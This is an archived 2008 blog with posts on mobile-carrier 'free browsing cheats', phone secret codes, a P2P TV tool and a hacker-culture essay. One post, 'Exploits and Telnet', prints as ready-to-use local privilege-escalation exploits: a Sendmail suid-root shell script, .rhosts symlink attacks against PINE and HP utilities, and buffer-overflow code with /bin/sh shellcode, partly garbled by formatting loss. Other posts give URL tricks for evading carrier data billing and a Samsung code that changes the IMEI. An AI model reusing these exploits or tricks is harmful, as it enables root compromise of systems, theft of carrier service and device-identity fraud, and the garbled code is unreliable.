Tuesday, December 30, 2008

Download operamini 4.1 mtn cheat naija version free

download operanaija 4.1 odawise known as OM 4.1 aed 4rm d link below & start surfin' straight up w/out botherin' 'bout d @ trick cuz it'z 'lready been patch'd by default
...Merry xmas naija.....

operamini 4.1

O.M-T9MTN 3.1

Wednesday, December 24, 2008

Watch TV and Movie Online using P2P Technology




Once P2P is being mentioned, we immediately think of Limewire, Frostwire, downloading, uploading, movies, music albums, mp3s… That is P2P file sharing and when you go to download a file, you are downloading the file from some guys computer who is sharing it. Other than using P2P for file sharing, do you know that P2P (peer to peer) technology can also be used for internet TV? I know there are quite a few online TV but this one has an extra channel call VoD (Video on Demand). From my VoD channel list, it is currently playing Infernal Affairs, Die Another Day, The Kingdom, Rocky Balboa, The Bourne Ultimatum, Pirates of the Carribean 3, Rush Hour 3, Live Free or Die Hard, Wild Hogs, Memoirs Of A Geisha, Primeval, Surfs Up, Spider Man 3, Transformers and A LOT MORE! It’s like having a satellite TV on your computer without paying a single cent.

SopCast is a simple, free way to broadcast video and audio or watch the video and listen to radio on the Internet. Adopting P2P(Peer-to-Peer) technology, It is very efficient and easy to use. Let anyone become a broadcaster without the costs of a powerful server and vast bandwidth. You can build your own TV stations comparable with large commercial sites with minimal resources. Using SopCast, you can serve 10,000 online users with a personal computer and a home broadband connection.


SoP is the abbreviation for Streaming over P2P. Sopcast is a Streaming Direct Broadcasting System based on P2P. The core is the communication protocol produced by Sopcast Team, which is named sop://, or Sop technology. SopCast Features:
State-of-the-art P2P technology. Share the data among all viewers, make the channel more available and stable.
Minimal delay in the P2P streaming market.
Fast buffering. 10-30seconds.
Firewall and NAT traversal technology to pass 90% P2P barriers.
Build your own channels and broadcast it over the Internet.
Streaming real time streams. Support for many streaming transport protocol. mms, http, etc.
Streaming media files. Many file types: asf, wmv, rm, rmvb, mp3, etc.
Support for loop file playing.
Extremely low memory footprint and CPU load
Standard channel URL: click on any sop:// URL to play.
Real time monitor of broadcasting source quality and network quality to help viewers to select a appropriate channel.
Record the clips when you are watching it.
Can play the stream with your favorite player, such as Windows Media Player, RealPlayer, VLC, etc.
Memory buffering, no harm to the hard disk.
Support for authentication for both the broadcasters and the viewers. The broadcaster has full control on his channels.
End-to-End security, encrypted messages, hi level P2P security, no hijack.
Support multiple channels broadcast on the same server. Normally, you can run 5-10 channels on one PC.
The Sop Player can be embedded into a webpage or any software applications. It works just like Windows Media Player.
The Sop Server and Sop Player can be run both on Windows and Linux. The whole system can be ported to embedded Linux.
Freeware, not ad/spy ware I’ve previously introduced TVU Networks. If you ask me which is better, I’d say SopCast is better because it has more channels and also video on demand. But since both SopCast and TVU Networks are free, why not use both? [ Download SopCast ]Download Sopcast

Tuesday, December 16, 2008

Exploits and Telnet

Exploits and TelnetExploits and TelnetWell exploits are the best way of hacking webpages but they are also morecomplicated then hacking through ftp or using the phf. Before you can setupan exploit you must first have a telnet proggie, there are many differentclients you can just do a netsearch and find everything you need.It's best to get an account with your target(if possible) and view theglitches from the inside out. Exploits expose errors or bugs in systemsand usually allow you to gain root access. There are many differentexploits around and you can view each seperately. I'm going to list afew below but the list of exploits is endless.This exploit is known as Sendmail v.8.8.4It creates a suid program /tmp/x that calls shell as root. This is how youset it up:cat <<>/tmp/x.c#define RUN "/bin/ksh"#includemain(){execl(RUN,RUN,NULL);}_EOF_#cat <<>/tmp/spawnfish.cmain(){execl("/usr/lib/sendmail","/tmp/smtpd",0); } _EOF_#cat <<>/tmp/smtpd.cmain(){setuid(0); setgid(0); system("chown root /tmp/x ;chmod 4755 /tmp/x");}_EOF_##gcc -O -o /tmp/x /tmp/x.cgcc -O3 -o /tmp/spawnfish /tmp/spawnfish.cgcc -O3 -o /tmp/smtpd /tmp/smtpd.c#/tmp/spawnfishkill -HUP `/usr/ucb/ps -axgrep /tmp/smtpdgrep -v grepsed s/"[ ]*"// cut -d" " -f1`rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.csleep 5if [ -u /tmp/x ] ; thenecho "leet..."/tmp/xfi and now on to another exploit. I'm going to display the pine exploit throughlinux. By watching the process table with ps to see which users are runningPINE, one can then do an ls in /tmp/ to gather the lockfile names for eachuser. Watching the process table once again will now reveal when each userquits PINE or runs out of unread messages in their INBOX, effectivelydeleting the respective lockfile.Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts(for a generic example) will cause PINE to create ~hamors/.rhosts as a666 file with PINE's process id as its contents. One may now simply doan echo "+ +" > /tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile.This was writen by Sean B. Hamor...For this example, hamors is the victimwhile catluvr is the attacker:hamors (21 19:04) litterbox:~> pinecatluvr (6 19:06) litterbox:~> ps -aux grep pinecatluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pinehamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pinecatluvr (7 19:07) litterbox:~> ls -al /tmp/ grep hamors- -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4catluvr (8 19:07) litterbox:~> ps -aux grep pinecatluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pinecatluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4hamors (23 19:09) litterbox:~> pinecatluvr (11 19:10) litterbox:~> ps -aux grep pinecatluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pinehamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pinecatluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4+ +catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamorsnow on to another one, this will be the last one that I'm going to show.Exploitation script for the ppp vulnerbility as described by no one to date,this is NOT FreeBSD-SA-96:15. Works onFreeBSD as tested. Mess with the numbers if it doesnt work. This is howyou set it up:#include #include #include #define BUFFER_SIZE 156 /* size of the bufer to overflow */#define OFFSET -290 /* number of bytes to jump after the startof the buffer */long get_esp(void) { __asm__("movl %esp,%eax\n"); }main(int argc, char *argv[]){char *buf = NULL;unsigned long *addr_ptr = NULL;char *ptr = NULL;char execshell[] ="\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */int i,j;buf = malloc(4096);/* fill start of bufer with nops */i = BUFFER_SIZE-strlen(execshell);memset(buf, 0x90, i);ptr = buf + i;/* place exploit code into the buffer */for(i = 0; i < addr_ptr =" (long" i="0;i" ptr =" (char" ptr =" 0;setenv(" host="'localhost'#USER="`whoami`HOST="" user="+"> /dev/nullln -s ~root/.rhosts coreAAA='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'STUFF=`echo "${AAA}\n${HOST} ${USER}"`ppl -o "${STUFF}"rm coreremsh localhost -l root sh -ischlowdishk exploit: #!/bin/ksh# OK.. this bug gets inserted into remwatch after the patch.. It was there# before in some versions, but now it's pretty much universal if the patch# gets installed...# Silly Scriptor & friend, SOD, (11Jun96)if [ ! -x /usr/remwatch/bin/disks/showdisk ]thenecho This is an exploit for the showdisk utility internal toecho HP\'s Remote Watch series of programs.echo The showdisk utility doesn\'t appear to be on your system.echo MooexitfiFILE=$1if [ -z "$FILE" ]thenFILE=/.rhostsfiif [ -f "$FILE" ]thenecho "Hey, there already a ${FILE}!"echo "I'd rather enjoy making new files, thank you very much..."exitfiumask 0000/usr/remwatch/bin/disks/showdisk arg arg ${FILE} arg > /dev/null 2>&1>${FILE}ls -l ${FILE}if [ "${FILE}" = "/.rhosts" ]thenecho "Adding + + ..."echo "+ +" >> /.rhostsremsh localhost -l root ksh -ifiglance exploit: You need only do the following:1. Log in as yourself.2. Decide what file you want to create for world write.3. do a umask 0004. Then do /usr/perf/bin/glance -f 5. After a few seconds, quit glance.6. That file will now be there and world is writeable, now edit it.7. If it previousle existed, it will be trunc'ed with orig perms.sysdiag exploit: Basically, the sysdiag stuff is set-uid root. You can exploit thatfeature to create and write stuff to arbitrary files on the system asroot,while not being root. If the target file you want to create exists,thisdoesn't work. Perhaps there is a way around that, but that ain't thepoint.The point is that I used this to get root in 30 seconds on my HP's andthat'snot good. Heck, this is probably faster then asking for the rootpassword !!!More on the problem:What happens is that a feature exists to create a log file of yoursysdiag session that can be invoked while in the program. You give itthename of the file to create, and if it is a sym link to a non-existantfile,sysdiag follows the sym link and creates the file as root for you andlogsyour session in it. To show a typical vunerability, I created /.rhostsfrom a sym link in /tmp that sysdiag followed and then caused sysdiagtoecho the line "+ +" in to the file. Then I could rlogin as root.If /.rhosts or /etc/hosts.equiv don't exist, you can use this trickto create and put a "+ +" in either of those files. That's an easy waytobecome root or someone else. You can do other files as well. Thisain'tcool, at all...How I tested this on my system:1. I logged in with my regular account2. I made a sym link with the command: ln -s /.rhosts /tmp/tempfile3. I ran the command: /bin/sysdiag4. From the DUI> prompt I typed: outfile /tmp/f15. From the DUI> prompt I typed: + +6. From the DUI> prompt I typed: redo7. When my previous command echoed to the screen I pressed .8. From the DUI> prompt I typed: exit9. Now at the shell prompt, and out of sysdiag, I typed:rlogin localhost -l root10. Once logged in I typed: idand it said I was root...This is the script of my sysdiag session:Script started on Sat Sep 21 23:29:10 1996$ iduid=1648(jjacobi) gid=999(systems)$ ls -l /tmptotal 0$ ls -l /.rhosts/.rhosts not found$ ln -s /.rhosts /tmp/tempfile$ ls -l /tmptotal 2lrwx--x--x 1 jjacobi systems 8 Sep 21 23:29 tempfile ->/.rhosts$ ls -l /.rhosts/.rhosts not found$ /bin/sysdiagsam exploit: Go to your HP 9.04/5 system first.1. Log into your system as a normal user.2. Compile the program below, making any changes if you need to. (youshouldn't need to)3. Log in on another terminal, become root and insure that sam is notcurrently executing.4. As the normal user log in, run the program that you compiled in step2.5. On the root log in session, run sam.6. Look at the target file./* Code to exploit race of sam calling iopasrer.shIt will usually cause the ioparser.sh script runby root to follow the sym links created here tocreate or truncate TARGET_FILENAME as root.It ain't pretty and may not always work, but usuallydoes.Compile on HP9000/[700/800] 9.04[5] with the command:cc racer.c -o racer -Ae*/#include #include #include #include #include #include #include #define PROC_TO_LOOK_FOR "sam" /* The process to lookfor in ps */#define TARGET_FILENAME "/check_this" /* File that is created ortrunc'ed */#define NUM_SYM_LINKS 50 /* Increase thisfor systems that fork() alot */void main(void){char ps_buf[65536]; /* ps data buffer */char *line; /* a pointer in to the ps_buf */char f1[80]; /* buffer space for the sym link name */char hostname[32]; /* buffer space to hold hostname, duh */int fd; /* fd is for the pipe */int ext; /* the extantion to place on thesymlink (pid) */int loop; /* Dumb loop variable,suggestions ??? */unlink("ps_fifo"); /* Whynot */mkfifo("ps_fifo",S_IRUSRS_IWUSR); /* Need this */fd = open("ps_fifo",O_RDONLYO_NONBLOCK); /* You read the pipe*/gethostname(hostname,32); /* gets the hostname just likeioparser.sh !!! */printf("Looking for process %s, will exploit filename%s\n",PROC_TO_LOOK_FOR,TARGET_FILENAME);/* FIGURE THE REST OUT YOURSELF, IT AIN'T ARTWORK... */while(1) {system("/bin/ps -u 0 > ps_fifo");read(fd,ps_buf,65536);if( (line = strstr(ps_buf,PROC_TO_LOOK_FOR)) != NULL ) {while( *line != '\n' ) {line--;}line+=2;line[5] = '\0';ext = atoi(line);for(loop = 1 ; loop <= NUM_SYM_LINKS ; loop ++){sprintf(f1,"/tmp/%s.%d",hostname,ext +loop);symlink(TARGET_FILENAME,f1);}while( (access(TARGET_FILENAME,F_OK)) <>#include #include char *shellcode ="\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1""\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04""\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb""\xcd\x80/""/bin/sh""0";char *get_sp() {asm("movl %esp,%eax");}#define bufsize 2048char buffer[bufsize];main() {int i;for (i = 0; i <>#include #include #include #include #define NOP 0x90const char usage[] = "usage: %s stack-offset buffer-size argv0 argv1 ...\n";extern code();void dummy( void ){extern lbl();/* do "exec( "/bin/sh" ); exit(0)" */__asm__( "code: xorl %edx, %edxpushl %edxjmp lblstart2: movl %esp, %ecxpopl %ebxmovb %edx, 0x7(%ebx)xorl %eax, %eaxmovb $0xB, %eaxint $0x80xorl %ebx, %ebxxorl %eax, %eaxinc %eaxint $0x80lbl: call start2.string \"/bin/sh\"");}void Fatal( int rv, const char *fmt, ... ){va_list vl;va_start( vl, fmt );vfprintf( stderr, fmt, vl );va_end( vl );exit( rv );}int main( int ac, char **av ){int buff_addr; /* where our code is */int stack_offset = 0,buffer_size = 0, i, code_size;char *buffer, *p;buff_addr = (int)(&buff_addr); /* get the stack pointer */code_size = strlen( (char *)code ); /* get the size of piece of *//* code in dummy() */if( ac < buffer_size =" strtoul(" buffer =" malloc(" i =" buffer_size"> buffer_size / 2; i -= 4 )*(int *)(buffer + i) = buff_addr;memset( buffer, NOP, buffer_size/2 );i = (buffer_size - code_size - 4)/2;memcpy( buffer + i, (char *)code, code_size );buffer[ buffer_size - 1 ] = '\0';p = malloc( strlen( av[ ac - 1 ] ) + code_size + 1 );if( !p )Fatal( -1, "malloc(): %s\n", strerror( errno ) );strcpy( p, av[ ac - 1 ] );strcat( p, buffer );av[ ac - 1 ] = p;execve( av[ 3 ], av + 3, NULL );perror( "exec():" );}I will send out more exploits in the next book I write. Common Ports-Program / Name Port________________________________________________________________________ discard 9netstat 15chargen 19 ftp 21 telnetd 23 smtp 25 rlp 39 bootp 67fingerk 79 http 80 / 8080military http 80 / 8080 / 5580 link 87 pop3 110identd 113 nntp 119 newsk 144 execk 512 login 513 pkill 515 ktalk 517 ntalk 518 netwall 533rmontior 560 montior 561kerberos 750Common telnet commands:Command Functionaccess Telnet accountc Connect to a hostcont Continued Disconnectfull Network echohalf Terminal echohangup Hangs upmail Mailset Select PAD parametersstat Show network port.telemail Mail

Monday, December 15, 2008

Free Mtn, Glo, Zain browsing cheats and tricks

Before getting the codes and settings you have to know this step How to connect your gprs/wap service For mtn network To activate your gprs/wap simply go to your message box type SETTINGS and send to 3888.If you have do it manually follow this instructions.MTN WAP Homepage; http://loaded.mtnonline.com@www.google.com/m/search
Account name: MTN WAP Access port name (APN):web.gprs.mtnnigeria.netIP Address: 010.199.212.002Port: 9201, 9119, 8080
User name; web Password: web 
MTN MMS Home page: http:// 10.119.212.8/service/mms
Account name: mtn mms Access port name: web.gprs.mtnnigeria.net IP address: 010.199.212.002Port: 9201 For more assistance, call 180 or 181 ZAIN NETWORK Go to your message box type wap/gprs(space) name of the phone(space) model and you send it to +232 or 184 and message will be sent to you to save the settings, save it using 0 or 0000.For manual setup Account name: Celtel NG or zain Homepage: http://portal.ng.celltel.com or http://dmc.ng.zain.comIP address: 172.18.254.5 or 192.168.124.4 Access point name (APN): access WAP or mms.ng.celtel.com Port: 8080Username: wap or mms Password: wap or mms GLO NETWORK Just type wap/gprs, the manufactures phone name and the model without putting space and send it to 927 or 667 and the setting will be send to you.For manual setup follow these steps.GLO WAP Account name: GwapHomepage: wap.gloworld.com IP address: 010.100.098.022Access point name: mms.gloworld.com Port: 3130Username: wapPassword: wapGLO MMSAccount name: glommsHomepage: mms.gloworld.comIP address: 010.100.098.022Access point name: glomms Port: 3130 Username: wap Password: wap As for codes, the codes for glo is not yet available, zain is experiencing some problems but if u have their old settings you can use it , but for mtn network follow these simple steps.1. Go to bookmark on your phone2. Click on the bookmark3. Click options4. Click on add new bookmark5. Type the following link codes and savehttp://loaded.mtnonline.com@ the site name you want to access http://musicloaded.mtnonline.com@ the site name you want to access save it with and you’re good to go. ORhttp://extraloaded.mtnonline.com@ the site name you want to access http://10.199.212.8@ any site name you want to accesshttp://72.32.124.166@ any site name you want to accesshttp://wap.sonyericsson.com@www.google.com/m/ and save Click on the word you saved and it will display Google homepage, use Google to access the page you are looking for, you can make research on any thing.Preferably Sony Ericsson and nokia phones, because with other phones you may not be able to access certain web pages like checking mails. But it works on almost all the phone that is gprs enabled.MOBILE CHATTING1. Go to bookmark on your phone2. Click on the bookmark3. Click options4. Click on add new bookmark5. Type the following link codes and savehttp://loaded.mtnonline.com@mig33.comhttp://loaded.mtnonline.com@wap.fotochatter.com/login.phphttp://loaded.mtnonline.com@9jawap.comhttp://loaded.mtnonline.com@coolslot.onmbl.nethttp://loaded.mtnonline.com@comicstar.buzx.wsCHECKING EMAILSGo to,http://musicloaded.mtnonline.com@sureproxy.com and save as bookmarkOnce the page opens type www.flurry.com Into the search box, and once the flurry page opens use it to access your email address. ORhttp://musicloaded.mtnonline.com@t9space.com, once the page opens Type into the search box, m.yahoo.com FREE SMShttp://loaded.mtnonline.com@jaxtr.comhttp://loaded.mtnonline.com@smsafric.comhttp://loaded.mtnonline.com@bluepulse.comzain and glo free browsing cheat shere is the new glo free browsing cheats .enjoywap.alcatel.com@any wap site name plz NB--- YOU NEED TO HAVE THE GLO MMSS SETTINGS BEFORE YOU CAN USE.CHECK THE MANUAL SETTINGS AT THE TOP MMS GPRS Account name: Celtel NG or zain Homepage: wap.google.com.ng/mIP address: 196.45.242.74 or 192.23.1.22Access point name (APN):mms.ng.celtel.com Port: 8080Username: mms Password: mms WAP GPRS Account name: Celtel NG or zainHomepage: wap.google.com.ng/mIP address: 172.023.001.022 or 192.168.124.4 Access point name (APN):wap.ng.celtel.comPort: 8080Username: wap Password: wap INTERNET GPRS Account name: Celtel NG or zainHomepage: wap.google.com.ng/mIP address: 172.023.001.022 or 192.168.124.4 Access point name (APN):internet.ng.celtel.comPort: 8080Username: internet Password: internet MMS GPRS Account name: Celtel NG or zainHomepage: wap.google.com.ng/mIP address: 172.023.001.022 or 192.168.124.4 Access point name (APN):mms.ng.celtel.comPort: 8080Username: mms Password: mms OLD MMS SETTINGS Account name: Celtel NG or zain Homepage: www.172.023.001.012/mms/wapencIP address: 172.023.001.012 Access point name (APN):mms.ng.celtel.comPort: 8080Username: mmsPassword: mms. Click commets below to read your responeses.

Friday, December 12, 2008

Sony Ericsson Secret codes

click here

Sony Ericsson Secret Menu: -> * <- <- * <- * (-> means press joystick, arrow keys or jogdial to the right and <- means left.) You'll see phone model, software info, IMEI, configuration info, sim lock status, REAL time clock, total call time and text labels. You can also test your phones services and hardware from this menu (main display, camera, LED/illumination, Flash LED, keyboard, earphone, speaker, microphone, radio and vibrator tests) IMEI Number: *#06# Lockstatus: <- * * <- Shortcut to last dialed numbers: 0# Shortcut to sim numbers: On main menu type a number and press # If you change the language from default to any other language, then it may be difficult to switch to default language. The shortcut is very simple. Just press <> . <> stands for right arrow button or joystick.

Samsung Mobile Service Center CODES

click here

Exclusive Stuff : Samsung Mobile
*#06# -> Show IMEI
*#9999# -> Show Software Version
*#0837# -> Show Software Version (instructions)
*#0001# -> Show Serial Parameters
*#9125# -> Activates the smiley when charging.
*#9998*228# -> Battery status (capacity, voltage, temperature)
*#9998*246# -> Program status
*#9998*289# -> Change Alarm Buzzer Frequenc
y *#9998*324# -> Debug screens
*#9998*364# -> Watchdog
*#9998*377# -> EEPROM Error Stack - Use side keys to select values. Cancel and ok.
*#9998*427# -> Trace Watchdog
*#9998*523# -> Change LCD contrast - Only with version G60RL01W
*#9998*544# -> Jig detect
*#9998*636# -> Memory status
*#9998*746# -> SIM File Size
*#9998*778# -> SIM Service Table
*#9998*785# -> RTK (Run Time Kernel) errors - if ok then phn is reset, info is put in memory error. *#9998*786# -> Run, Last UP, Last DOWN
*#9998*837# -> Software Version
*#9998*842# -> Test Vibrator - Flash the screenligth during 10 seconds and vibration activated.
*#9998*862# -> Vocoder Reg - Normal, Earphone or carkit can be selected
*#9998*872# -> Diag
*#9998*947# -> Reset On Fatal Error
*#9998*999# -> Last/Chk
*#9998*9266# -> Yann debug screen (=Debug Screens?)
*#9998*9999# -> Software version
*0001*s*f*t# -> Changes serial parameters (s=?, f=0,1, t=0,1) (incomplete) *0002*?# -> unknown *0003*?# -> unknown
SP-unlock SGH-600 and SGH 2100
*2767*3855# -> Full EEPROM Reset ( THIS CODE REMOVES the Security Lock and formats The Mobile's Chipset ) But also changes IMEI to 447967-89-400044-0, To restore your old IMEI use the IMEI program found on the software page.
*2767*2878# -> Custom EEEPROM Reset ( does not change the securitu CODE )

Saturday, December 6, 2008

How To Become A Hacker

click here

The Hacker Attitude Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude. But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you'll miss the point. Becoming the kind of person who believes these things is important for you -- for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the mind-set of masters -- not just intellectually but emotionally as well. So, if you want to be a hacker, repeat the following things until you believe them:
1. The world is full of fascinating problems waiting to be solved.Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort takes motivation. Successful athletes get their motivation from a kind of physical delight in making their bodies perform, in pushing themselves past their own physical limits. Similarly, to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence. If you aren't the kind of person that feels this way naturally, you'll need to become one in order to make it as a hacker. Otherwise you'll find your hacking energy is sapped by distractions like sex, money, and social approval. (You also have to develop a kind of faith in your own learning capacity -- a belief that even though you may not know all of what you need to solve a problem, if you tackle just a piece of it and learn from that, you'll learn enough to solve the next piece -- and so on, until you're done.)
2. Nobody should ever have to solve a problem twice.Creative brains are a valuable, limited resource. They shouldn't be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out there. To behave like a hacker, you have to believe that the thinking time of other hackers is precious -- so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones. (You don't have to believe that you're obligated to give all your creative product away, though the hackers that do are the ones that get most respect from other hackers. It's consistent with hacker values to sell enough of it to keep you in food and rent and computers. It's consistent to use your hacking skills to support a family or even get rich, as long as you don't forget you're a hacker while you're doing it.)
3. Boredom and drudgery are evil.Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren't doing what only they can do -- solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but actually evil. To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers). (There is one apparent exception to this. Hackers will sometimes do things that may seem repetitive or boring to an observer as a mind-clearing excercise, or in order to acquire a skill or have some particular kind of experience you can't have otherwise. But this is by choice -- nobody who can think should ever be forced into boredom.)
4. Freedom is good.Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you're being fascinated by -- and, given the way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it smother you and other hackers. (This isn't the same as fighting all authority. Children need to be guided and criminals restrained. A hacker may agree to accept some kinds of authority in order to get something he wants more than the time he spends following orders. But that's a limited, conscious bargain; the kind of personal surrender authoritarians want is not on offer.) Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing -- they only like `cooperation' that they control. So to behave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you have to be willing to act on that belief.
5. Attitude is no substitute for competence.To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won't make you a hacker, any more than it will make you a champion athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work. Therefore, you have to learn to distrust attitude and respect competence of every kind. Hackers won't let posers waste their time, but they worship competence -- especially competence at hacking, but competence at anything is good. Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best. If you revere competence, you'll enjoy developing it in yourself -- the hard work and dedication will become a kind of intense play rather than drudgery. And that's vital to becoming a hacker. Basic Hacking Skills The hacker attitude is vital, but skills are even more vital. Attitude is no substitute for competence, and there's a certain basic toolkit of skills which you have to have before any hacker will dream of calling you one. This tookit changes slowly over time as technology creates new skills and makes old ones obsolete. For example, it used to include programming in machine language, and didn't until recently involve HTML. But in late 1996 it pretty clearly includes the following:
1. Learn how to program.This, of course, is the fundamental hacking skill. In 1997 the one language you absolutely must learn is C (though it's not the one to try learning first thing). But you aren't a hacker or even merely a programmer if you only know one language -- you need to learn how to think about programming problems in a general way, independent of any one language. To be a real hacker, you need to have gotten to the point where you can learn a new language in days by relating what's in the manual to what you already know. This means you should learn several very different languages. Besides C, you should also learn at least LISP and Perl (and Java is pushing hard for a place on the list). Besides being the most important hacking languages, these each represent very different approaches to programming, and all will educate you in valuable ways. I can't give complete instructions on how to learn to program here -- it's a complex skill. But I can tell you that books and courses won't do it (many, maybe most of the best hackers are self-taught). What will do it is (a) reading code and (b) writing code. Learning to program is like learning to write good natural language. The best way to do it is to read some stuff written by masters of the form, write some things yourself, read a lot more, write a little more, read a lot more, write some more ... and repeat until your writing begins to develop the kind of strength and economy you see in your models. Finding good code to read used to be hard, because there were few large programs available in source for fledgeling hackers to read and tinker with. This has changed dramatically; free software, free programming tools, and free operating systems (all available in source, and all built by hackers) are now widely available. Which brings me neatly to our next topic...
2. Get one of the free UNIXes and learn to use and run it.I'm assuming you have a personal computer or can get access to one (these kids today have it so easy :-)). The single most important step any newbie can take towards acquiring hacker skills is to get a copy of Linux or one of the free BSD-Unixes, install it on a personal machine, and run it. Yes, there are other operating systems in the world besides Unix. But they're distributed in binary -- you can't read the code, and you can't modify it. Trying to learn to hack on a DOS or Windows machine or under MacOS is like trying to learn to dance while wearing a body cast. Besides, Unix is the operating system of the Internet. While you can learn to use the Internet without knowing Unix, you can't be an Internet hacker without understanding it. For this reason, the hacker culture today is pretty strongly Unix-centered. (This wasn't always true, and some old-time hackers aren't happy about it, but the symbiosis between Unix and the Internet has become strong enough that even Microsoft's muscle doesn't seem able to seriously dent it.) So, bring up a Unix -- I like Linux myself but there are other ways. Learn it. Run it. Tinker with it. Talk to the Internet with it. Read the code. Modify the code. You'll get better programming tools (including C, Lisp, and Perl) than any Microsoft operating system can dream of, you'll have fun, and you'll soak up more knowledge than you realize you're learning until you look back on it as a master hacker.
3. Learn how to use the World Wide Web and write HTML.Most of the things the hacker culture has built do their work out of sight, helping run factories and offices and universities without any obvious impact on how non-hackers live. The Web is the one big exception, the huge shiny hacker toy that even politicians admit is changing the world. For this reason alone (and a lot of other good ones as well) you need to learn how to work the Web. This doesn't just mean learning how to drive a browser (anyone can do that), but learning how to write HTML, the Web's markup language. If you don't know how to program, writing HTML will teach you some mental habits that will help you learn. So build a home page. But just having a home page isn't anywhere near good enough to make you a hacker. The Web is full of home pages. Most of them are pointless, zero-content sludge -- very snazzy-looking sludge, mind you, but sludge all the same .Status in the Hacker Culture Like most cultures without a money economy, hackerdom runs on reputation. You're trying to solve interesting problems, but how interesting they are, and whether your solutions are really good, is something that only your technical peers or superiors are normally equipped to judge. Accordingly, when you play the hacker game, you learn to keep score primarily by what other hackers think of your skill (this is why you aren't really a hacker until other hackers consistently call you one). This fact is obscured by the image of hacking as solitary work; also by a hacker-cultural taboo (now gradually decaying but still potent) against admitting that ego or external validation are involved in one's motivation at all. Specifically, hackerdom is what anthropologists call a gift culture. You gain status and reputation in it not by dominating other people, nor by being beautiful, nor by having things other people want, but rather by giving things away. Specifically, by giving away your time, your creativity, and the results of your skill. There are basically five kinds of things you can do to be respected by hackers:
1. Write free software.The first (the most central and most traditional) is to write programs that other hackers think are fun or useful, and give the program sources to the whole hacker culture to use. Hackerdom's most revered demigods are people who have written large, capable programs that met a widespread need and given them away, so that now everyone uses them.
2. Help test and debug free softwareThey also serve who stand and debug free software. In this imperfect world, we will inevitably spend most of our software development time in the debugging phase. That's why any free-software author who's thinking will tell you that good beta-testers (who know how to describe symptoms clearly, localize problems well, can tolerate bugs in a quickie release, and are willing to apply a few simple diagnostic routines) are worth their weight in rubies. Even one of these can make the difference between a debugging phase that's a protracted, exhausting nightmare and one that's merely a salutory nuisance. If you're a newbie, try to find a program under development that you're interested in and be a good beta-tester. There's a natural progression from helping test programs to helping debug them to helping modify them. You'll learn a lot this way, and generate good karma with people who will help you later on.
3. Publish useful information.Another good thing is to collect and filter useful and interesting information into Web pages or documents like FAQs (Frequently Asked Questions lists), and make those generally available. Maintainers of major technical FAQs get almost as much respect as free-software authors.
4. Help keep the infrastructure working.The hacker culture (and the engineering development of the Internet, for that matter) is run by volunteers. There's a lot of necessary but unglamorous work that needs done to keep it going -- administering mailing lists, moderating newsgroups, maintaining large software archive sites, developing RFCs and other technical standards. People who do this sort of thing well get a lot of respect, because everybody knows these jobs are huge time sinks and not much fun as playing with code. Doing them shows dedication.
Q: What language should I learn first?HTML, if you don't already know it. There are a lot of glossy, hype-intensive bad HTML books out there, and distressingly few good ones. The one I like best is HTML: The Definitive Guide. When you're ready to start programming, I would recommend starting with Perl or Python. C is really important, but it's also much harder.
